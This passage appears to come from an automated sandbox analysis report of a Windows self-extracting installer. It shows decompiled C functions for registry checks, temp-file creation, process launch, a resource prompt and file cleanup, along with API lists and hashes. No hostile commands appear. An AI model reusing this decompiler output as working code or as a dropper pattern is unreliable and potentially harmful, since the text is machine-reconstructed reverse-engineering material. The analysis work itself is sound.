                                                          • Instruction Fuzzy Hash: C9110471700208ABE3309B269C48FEF7A6DEBD5B15F10416DF6C6D3280DE7999428FA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 519 10c256d-10c257d 520 10c2622-10c2627 call 10c24e0 519->520 521 10c2583-10c2589 519->521 525 10c2629-10c262f 520->525 522 10c25e8-10c2607 RegOpenKeyExA 521->522 523 10c258b 521->523 527 10c2609-10c2620 RegQueryInfoKeyA 522->527 528 10c25e3-10c25e6 522->528 523->525 526 10c2591-10c2595 523->526 526->525 530 10c259b-10c25ba RegOpenKeyExA 526->530 531 10c25d1-10c25dd RegCloseKey 527->531 528->525 530->528 532 10c25bc-10c25cb RegQueryValueExA 530->532 531->528 532->531
                                                          C-Code - Quality: 86%
                                                          			E010C256D(signed int __ecx) {
                                                          				int _v8;
                                                          				void* _v12;
                                                          				signed int _t13;
                                                          				signed int _t19;
                                                          				long _t24;
                                                          				void* _t26;
                                                          				int _t31;
                                                          				void* _t34;
                                                          
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t13 = __ecx & 0x0000ffff;
                                                          				_t31 = 0;
                                                          				if(_t13 == 0) {
                                                          					_t31 = E010C24E0(_t26);
                                                          				} else {
                                                          					_t34 = _t13 - 1;
                                                          					if(_t34 == 0) {
                                                          						_v8 = 0;
                                                          						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                          							goto L7;
                                                          						} else {
                                                          							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                          							goto L6;
                                                          						}
                                                          						L12:
                                                          					} else {
                                                          						if(_t34 > 0 && __ecx <= 3) {
                                                          							_v8 = 0;
                                                          							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                          							if(_t24 == 0) {
                                                          								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                          								L6:
                                                          								asm("sbb eax, eax");
                                                          								_v8 = _v8 &  !( ~_t19);
                                                          								RegCloseKey(_v12); // executed
                                                          							}
                                                          							L7:
                                                          							_t31 = _v8;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t31;
                                                          				goto L12;
                                                          			}












                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,010C4096,010C4096,?,010C1ED3,00000001,00000000,?,?,010C4137,?), ref: 010C25B2
                                                          • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,010C4096,?,010C1ED3,00000001,00000000,?,?,010C4137,?,010C4096), ref: 010C25CB
                                                          • RegCloseKey.KERNELBASE(?,?,010C1ED3,00000001,00000000,?,?,010C4137,?,010C4096), ref: 010C25DD
                                                          • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,010C4096,010C4096,?,010C1ED3,00000001,00000000,?,?,010C4137,?), ref: 010C25FF
                                                          • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,010C4096,00000000,00000000,00000000,00000000,?,010C1ED3,00000001,00000000), ref: 010C261A
                                                          Strings
                                                          • PendingFileRenameOperations, xrefs: 010C25C3
                                                          • System\CurrentControlSet\Control\Session Manager, xrefs: 010C25A8
                                                          • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 010C25F5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: OpenQuery$CloseInfoValue
                                                          • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                          • API String ID: 2209512893-559176071
                                                          • Opcode ID: 53b17551fdb9191d1648fe695c5b4729602f5e4ce1ced80f7ec658aa74c3b8b2
                                                          • Instruction ID: 080f20ee91990fc4c15db5424312c66be245ddda9655c59d097e20121730e078
                                                          • Opcode Fuzzy Hash: 53b17551fdb9191d1648fe695c5b4729602f5e4ce1ced80f7ec658aa74c3b8b2
                                                          • Instruction Fuzzy Hash: BF118635902228FF9B30DB969C0DDFFBEBCEF15BA1F104099B989A2100D6354A44DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 533 10c6a60-10c6a91 call 10c7155 call 10c7208 GetStartupInfoW 539 10c6a93-10c6aa2 533->539 540 10c6abc-10c6abe 539->540 541 10c6aa4-10c6aa6 539->541 544 10c6abf-10c6ac5 540->544 542 10c6aaf-10c6aba Sleep 541->542 543 10c6aa8-10c6aad 541->543 542->539 543->544 545 10c6ac7-10c6acf _amsg_exit 544->545 546 10c6ad1-10c6ad7 544->546 547 10c6b0b-10c6b11 545->547 548 10c6ad9-10c6ae9 call 10c6c3f 546->548 549 10c6b05 546->549 551 10c6b2e-10c6b30 547->551 552 10c6b13-10c6b24 _initterm 547->552 553 10c6aee-10c6af2 548->553 549->547 554 10c6b3b-10c6b42 551->554 555 10c6b32-10c6b39 551->555 552->551 553->547 556 10c6af4-10c6b00 553->556 557 10c6b44-10c6b51 call 10c7060 554->557 558 10c6b67-10c6b71 554->558 555->554 560 10c6c39-10c6c3e call 10c724d 556->560 557->558 568 10c6b53-10c6b65 557->568 559 10c6b74-10c6b79 558->559 562 10c6b7b-10c6b7d 559->562 563 10c6bc5-10c6bc8 559->563 566 10c6b7f-10c6b81 562->566 567 10c6b94-10c6b98 562->567 570 10c6bca-10c6bd3 563->570 571 10c6bd6-10c6be3 _ismbblead 563->571 566->563 574 10c6b83-10c6b85 566->574 575 10c6b9a-10c6b9e 567->575 576 10c6ba0-10c6ba2 567->576 568->558 570->571 572 10c6be9-10c6bed 571->572 573 10c6be5-10c6be6 571->573 572->559 577 10c6c1e-10c6c25 572->577 573->572 574->567 578 10c6b87-10c6b8a 574->578 579 10c6ba3-10c6bbc call 10c2bfb 575->579 576->579 582 10c6c27-10c6c2d _cexit 577->582 583 10c6c32 577->583 578->567 581 10c6b8c-10c6b92 578->581 579->577 586 10c6bbe-10c6bbf exit 579->586 581->574 582->583 583->560 586->563
                                                          C-Code - Quality: 51%
                                                          			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                          				signed int* _t25;
                                                          				signed int _t26;
                                                          				signed int _t29;
                                                          				int _t30;
                                                          				signed int _t37;
                                                          				signed char _t41;
                                                          				signed int _t53;
                                                          				signed int _t54;
                                                          				intOrPtr _t56;
                                                          				signed int _t58;
                                                          				signed int _t59;
                                                          				intOrPtr* _t60;
                                                          				void* _t62;
                                                          				void* _t67;
                                                          				void* _t68;
                                                          
                                                          				L010C7155();
                                                          				_push(0x58);
                                                          				_push(0x10c72b8);
                                                          				E010C7208(__ebx, __edi, __esi);
                                                          				 *(_t62 - 0x20) = 0;
                                                          				GetStartupInfoW(_t62 - 0x68);
                                                          				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                          				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                          				_t53 = 0;
                                                          				while(1) {
                                                          					asm("lock cmpxchg [edx], ecx");
                                                          					if(0 == 0) {
                                                          						break;
                                                          					}
                                                          					if(0 != _t56) {
                                                          						Sleep(0x3e8);
                                                          						continue;
                                                          					} else {
                                                          						_t58 = 1;
                                                          						_t53 = 1;
                                                          					}
                                                          					L7:
                                                          					_t67 =  *0x10c88b0 - _t58; // 0x2
                                                          					if(_t67 != 0) {
                                                          						__eflags =  *0x10c88b0; // 0x2
                                                          						if(__eflags != 0) {
                                                          							 *0x10c81e4 = _t58;
                                                          							goto L13;
                                                          						} else {
                                                          							 *0x10c88b0 = _t58;
                                                          							_t37 = E010C6C3F(0x10c10b8, 0x10c10c4); // executed
                                                          							__eflags = _t37;
                                                          							if(__eflags == 0) {
                                                          								goto L13;
                                                          							} else {
                                                          								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                          								_t30 = 0xff;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_push(0x1f);
                                                          						L010C6FF4();
                                                          						L13:
                                                          						_t68 =  *0x10c88b0 - _t58; // 0x2
                                                          						if(_t68 == 0) {
                                                          							_push(0x10c10b4);
                                                          							_push(0x10c10ac);
                                                          							L010C7202();
                                                          							 *0x10c88b0 = 2;
                                                          						}
                                                          						if(_t53 == 0) {
                                                          							 *0x10c88ac = 0;
                                                          						}
                                                          						_t71 =  *0x10c88b4;
                                                          						if( *0x10c88b4 != 0 && E010C7060(_t71, 0x10c88b4) != 0) {
                                                          							_t60 =  *0x10c88b4; // 0x0
                                                          							 *0x10ca288(0, 2, 0);
                                                          							 *_t60();
                                                          						}
                                                          						_t25 = __imp___acmdln; // 0x76665b9c
                                                          						_t59 =  *_t25;
                                                          						 *(_t62 - 0x1c) = _t59;
                                                          						_t54 =  *(_t62 - 0x20);
                                                          						while(1) {
                                                          							_t41 =  *_t59;
                                                          							if(_t41 > 0x20) {
                                                          								goto L32;
                                                          							}
                                                          							if(_t41 != 0) {
                                                          								if(_t54 != 0) {
                                                          									goto L32;
                                                          								} else {
                                                          									while(_t41 != 0 && _t41 <= 0x20) {
                                                          										_t59 = _t59 + 1;
                                                          										 *(_t62 - 0x1c) = _t59;
                                                          										_t41 =  *_t59;
                                                          									}
                                                          								}
                                                          							}
                                                          							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                          							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                          								_t29 = 0xa;
                                                          							} else {
                                                          								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                          							}
                                                          							_push(_t29);
                                                          							_t30 = E010C2BFB(0x10c0000, 0, _t59); // executed
                                                          							 *0x10c81e0 = _t30;
                                                          							__eflags =  *0x10c81f8;
                                                          							if( *0x10c81f8 == 0) {
                                                          								exit(_t30); // executed
                                                          								goto L32;
                                                          							}
                                                          							__eflags =  *0x10c81e4;
                                                          							if( *0x10c81e4 == 0) {
                                                          								__imp___cexit();
                                                          								_t30 =  *0x10c81e0; // 0x0
                                                          							}
                                                          							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                          							goto L40;
                                                          							L32:
                                                          							__eflags = _t41 - 0x22;
                                                          							if(_t41 == 0x22) {
                                                          								__eflags = _t54;
                                                          								_t15 = _t54 == 0;
                                                          								__eflags = _t15;
                                                          								_t54 = 0 | _t15;
                                                          								 *(_t62 - 0x20) = _t54;
                                                          							}
                                                          							_t26 = _t41 & 0x000000ff;
                                                          							__imp___ismbblead(_t26);
                                                          							__eflags = _t26;
                                                          							if(_t26 != 0) {
                                                          								_t59 = _t59 + 1;
                                                          								__eflags = _t59;
                                                          								 *(_t62 - 0x1c) = _t59;
                                                          							}
                                                          							_t59 = _t59 + 1;
                                                          							 *(_t62 - 0x1c) = _t59;
                                                          						}
                                                          					}
                                                          					L40:
                                                          					return E010C724D(_t30);
                                                          				}
                                                          				_t58 = 1;
                                                          				__eflags = 1;
                                                          				goto L7;
                                                          			}



















                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_initterm_ismbbleadexit
                                                          • String ID:
                                                          • API String ID: 359039474-0
                                                          • Opcode ID: cc99d7c88bd299f3347b04c2b9a043fceb351fd9d95f4e02e68a05b339a9bc9d
                                                          • Instruction ID: 41724d1c1c416049fe87cad2aad0b81fc874579e140672e19f3a30a4dc52b357
                                                          • Opcode Fuzzy Hash: cc99d7c88bd299f3347b04c2b9a043fceb351fd9d95f4e02e68a05b339a9bc9d
                                                          • Instruction Fuzzy Hash: EF41E471A44229DFDB719B6DD8047AE7BE5FB84F10F14805EE9C197381DB7A44808F94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 587 10c58c8-10c58d5 588 10c58d8-10c58dd 587->588 588->588 589 10c58df-10c58f1 LocalAlloc 588->589 590 10c5919-10c5959 call 10c1680 call 10c658a CreateFileA LocalFree 589->590 591 10c58f3-10c5901 call 10c44b9 589->591 594 10c5906-10c5910 call 10c6285 590->594 601 10c595b-10c596c CloseHandle GetFileAttributesA 590->601 591->594 600 10c5912-10c5918 594->600 601->594 602 10c596e-10c5970 601->602 602->594 603 10c5972-10c597b 602->603 603->600
                                                          C-Code - Quality: 95%
                                                          			E010C58C8(intOrPtr* __ecx) {
                                                          				void* _v8;
                                                          				intOrPtr _t6;
                                                          				void* _t10;
                                                          				void* _t12;
                                                          				void* _t14;
                                                          				signed char _t16;
                                                          				void* _t20;
                                                          				void* _t23;
                                                          				intOrPtr* _t27;
                                                          				CHAR* _t33;
                                                          
                                                          				_push(__ecx);
                                                          				_t33 = __ecx;
                                                          				_t27 = __ecx;
                                                          				_t23 = __ecx + 1;
                                                          				do {
                                                          					_t6 =  *_t27;
                                                          					_t27 = _t27 + 1;
                                                          				} while (_t6 != 0);
                                                          				_t36 = _t27 - _t23 + 0x14;
                                                          				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                          				if(_t20 != 0) {
                                                          					E010C1680(_t20, _t36, _t33);
                                                          					E010C658A(_t20, _t36, "TMP4351$.TMP");
                                                          					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                          					_v8 = _t10;
                                                          					LocalFree(_t20);
                                                          					_t12 = _v8;
                                                          					if(_t12 == 0xffffffff) {
                                                          						goto L4;
                                                          					} else {
                                                          						CloseHandle(_t12);
                                                          						_t16 = GetFileAttributesA(_t33); // executed
                                                          						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                          							goto L4;
                                                          						} else {
                                                          							 *0x10c9124 = 0;
                                                          							_t14 = 1;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					E010C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          					L4:
                                                          					 *0x10c9124 = E010C6285();
                                                          					_t14 = 0;
                                                          				}
                                                          				return _t14;
                                                          			}













                                                          APIs
                                                          • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,010C5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C58E7
                                                          • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,010C5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C5943
                                                          • LocalFree.KERNEL32(00000000,?,010C5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C594D
                                                          • CloseHandle.KERNEL32(00000000,?,010C5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C595C
                                                          • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,010C5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C5963
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                          • API String ID: 747627703-3104274291
                                                          • Opcode ID: ec13480f9cd10c5db53ad5cecea1877c4b7db6b842318f2f8f3bda31674d62b4
                                                          • Instruction ID: 67879e8bdefe16bf2edc53a97a29725022607d088baccd56d1bc8b13e39e9ed6
                                                          • Opcode Fuzzy Hash: ec13480f9cd10c5db53ad5cecea1877c4b7db6b842318f2f8f3bda31674d62b4
                                                          • Instruction Fuzzy Hash: 46112671700215ABD7301F7A5C0CADF7E99EF8AAA4B10065DF5C6D32C5DA75A8058FA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 631 10c3fef-10c4010 632 10c410a-10c411a call 10c6ce0 631->632 633 10c4016-10c403b CreateProcessA 631->633 634 10c40c4-10c4101 call 10c6285 GetLastError FormatMessageA call 10c44b9 633->634 635 10c4041-10c406e WaitForSingleObject GetExitCodeProcess 633->635 647 10c4106 634->647 637 10c4070-10c4077 635->637 638 10c4091 call 10c411b 635->638 637->638 642 10c4079-10c407b 637->642 646 10c4096-10c40b8 CloseHandle * 2 638->646 642->638 645 10c407d-10c4089 642->645 645->638 648 10c408b 645->648 649 10c4108 646->649 650 10c40ba-10c40c0 646->650 647->649 648->638 649->632 650->649 651 10c40c2 650->651 651->647
                                                          C-Code - Quality: 84%
                                                          			E010C3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                          				signed int _v8;
                                                          				char _v524;
                                                          				long _v528;
                                                          				struct _PROCESS_INFORMATION _v544;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t20;
                                                          				void* _t22;
                                                          				int _t25;
                                                          				intOrPtr* _t39;
                                                          				signed int _t44;
                                                          				void* _t49;
                                                          				signed int _t50;
                                                          				intOrPtr _t53;
                                                          
                                                          				_t45 = __edx;
                                                          				_t20 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t20 ^ _t50;
                                                          				_t39 = __ecx;
                                                          				_t49 = 1;
                                                          				_t22 = 0;
                                                          				if(__ecx == 0) {
                                                          					L13:
                                                          					return E010C6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                          				}
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                          				if(_t25 == 0) {
                                                          					 *0x10c9124 = E010C6285();
                                                          					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                          					_t45 = 0x4c4;
                                                          					E010C44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                          					L11:
                                                          					_t49 = 0;
                                                          					L12:
                                                          					_t22 = _t49;
                                                          					goto L13;
                                                          				}
                                                          				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                          				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                          				_t44 = _v528;
                                                          				_t53 =  *0x10c8a28; // 0x0
                                                          				if(_t53 == 0) {
                                                          					_t34 =  *0x10c9a2c; // 0x0
                                                          					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                          						_t34 = _t44 & 0xff000000;
                                                          						if((_t44 & 0xff000000) == 0xaa000000) {
                                                          							 *0x10c9a2c = _t44;
                                                          						}
                                                          					}
                                                          				}
                                                          				E010C411B(_t34, _t44);
                                                          				CloseHandle(_v544.hThread);
                                                          				CloseHandle(_v544);
                                                          				if(( *0x10c9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                          					goto L12;
                                                          				} else {
                                                          					goto L11;
                                                          				}
                                                          			}


















                                                          APIs
                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 010C4033
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 010C4049
                                                          • GetExitCodeProcess.KERNELBASE ref: 010C405C
                                                          • CloseHandle.KERNEL32(?), ref: 010C409C
                                                          • CloseHandle.KERNEL32(?), ref: 010C40A8
                                                          • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010C40DC
                                                          • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010C40E9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 3183975587-0
                                                          • Opcode ID: 35deb9fc9cef67866b8bd6a1d304716878707c424cc3b096214d4e4eb4795e0a
                                                          • Instruction ID: 9acb1ea58e87c7b929565143024a0b0f61aedfe4dac52a43ad0b08248ed2ddae
                                                          • Opcode Fuzzy Hash: 35deb9fc9cef67866b8bd6a1d304716878707c424cc3b096214d4e4eb4795e0a
                                                          • Instruction Fuzzy Hash: DC319E31640218AFEB709B69DC4CFAB77B8EBD4B44F2001ADF985D2191DA3649818F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 652 10c51e5-10c520b call 10c468f LocalAlloc 655 10c522d-10c523c call 10c468f 652->655 656 10c520d-10c5228 call 10c44b9 call 10c6285 652->656 661 10c523e-10c5260 call 10c44b9 LocalFree 655->661 662 10c5262-10c5270 lstrcmpA 655->662 671 10c52b0 656->671 661->671 665 10c527e-10c529c call 10c44b9 LocalFree 662->665 666 10c5272-10c5273 LocalFree 662->666 674 10c529e-10c52a4 665->674 675 10c52a6 665->675 669 10c5279-10c527c 666->669 672 10c52b2-10c52b5 669->672 671->672 674->669 675->671
                                                          C-Code - Quality: 100%
                                                          			E010C51E5(void* __eflags) {
                                                          				int _t5;
                                                          				void* _t6;
                                                          				void* _t28;
                                                          
                                                          				_t1 = E010C468F("UPROMPT", 0, 0) + 1; // 0x1
                                                          				_t28 = LocalAlloc(0x40, _t1);
                                                          				if(_t28 != 0) {
                                                          					if(E010C468F("UPROMPT", _t28, _t29) != 0) {
                                                          						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                          						if(_t5 != 0) {
                                                          							_t6 = E010C44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                          							LocalFree(_t28);
                                                          							if(_t6 != 6) {
                                                          								 *0x10c9124 = 0x800704c7;
                                                          								L10:
                                                          								return 0;
                                                          							}
                                                          							 *0x10c9124 = 0;
                                                          							L6:
                                                          							return 1;
                                                          						}
                                                          						LocalFree(_t28);
                                                          						goto L6;
                                                          					}
                                                          					E010C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          					LocalFree(_t28);
                                                          					 *0x10c9124 = 0x80070714;
                                                          					goto L10;
                                                          				}
                                                          				E010C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          				 *0x10c9124 = E010C6285();
                                                          				goto L10;
                                                          			}






                                                          APIs
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46A0
                                                            • Part of subcall function 010C468F: SizeofResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46A9
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46C3
                                                            • Part of subcall function 010C468F: LoadResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46CC
                                                            • Part of subcall function 010C468F: LockResource.KERNEL32(00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46D3
                                                            • Part of subcall function 010C468F: memcpy_s.MSVCRT ref: 010C46E5
                                                            • Part of subcall function 010C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46EF
                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010C2F4D,?,00000002,00000000), ref: 010C5201
                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010C5250
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                            • Part of subcall function 010C6285: GetLastError.KERNEL32(010C5BBC), ref: 010C6285
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                          • String ID: <None>$UPROMPT
                                                          • API String ID: 957408736-2980973527
                                                          • Opcode ID: 3e760b4fee590bb4fa161e4f78a267cc1db410dee94870f44ccc4797798262af
                                                          • Instruction ID: 084d0384eab34208bae7267ea84b1d7d5fb4845876b112dc33b73ae8a5a2a9fd
                                                          • Opcode Fuzzy Hash: 3e760b4fee590bb4fa161e4f78a267cc1db410dee94870f44ccc4797798262af
                                                          • Instruction Fuzzy Hash: D011D0B9700205AFE3256B759C59B7FB1DEEBC9B84B10402DBAC2D6184EA7E9C004E24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E010C52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				signed int _t9;
                                                          				signed int _t11;
                                                          				void* _t21;
                                                          				void* _t29;
                                                          				CHAR** _t31;
                                                          				void* _t32;
                                                          				signed int _t33;
                                                          
                                                          				_t28 = __edi;
                                                          				_t22 = __ecx;
                                                          				_t21 = __ebx;
                                                          				_t9 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t9 ^ _t33;
                                                          				_push(__esi);
                                                          				_t31 =  *0x10c91e0; // 0xc282e0
                                                          				if(_t31 != 0) {
                                                          					_push(__edi);
                                                          					do {
                                                          						_t29 = _t31;
                                                          						if( *0x10c8a24 == 0 &&  *0x10c9a30 == 0) {
                                                          							SetFileAttributesA( *_t31, 0x80); // executed
                                                          							DeleteFileA( *_t31); // executed
                                                          						}
                                                          						_t31 = _t31[1];
                                                          						LocalFree( *_t29);
                                                          						LocalFree(_t29);
                                                          					} while (_t31 != 0);
                                                          					_pop(_t28);
                                                          				}
                                                          				_t11 =  *0x10c8a20; // 0x0
                                                          				_pop(_t32);
                                                          				if(_t11 != 0 &&  *0x10c8a24 == 0 &&  *0x10c9a30 == 0) {
                                                          					_push(_t22);
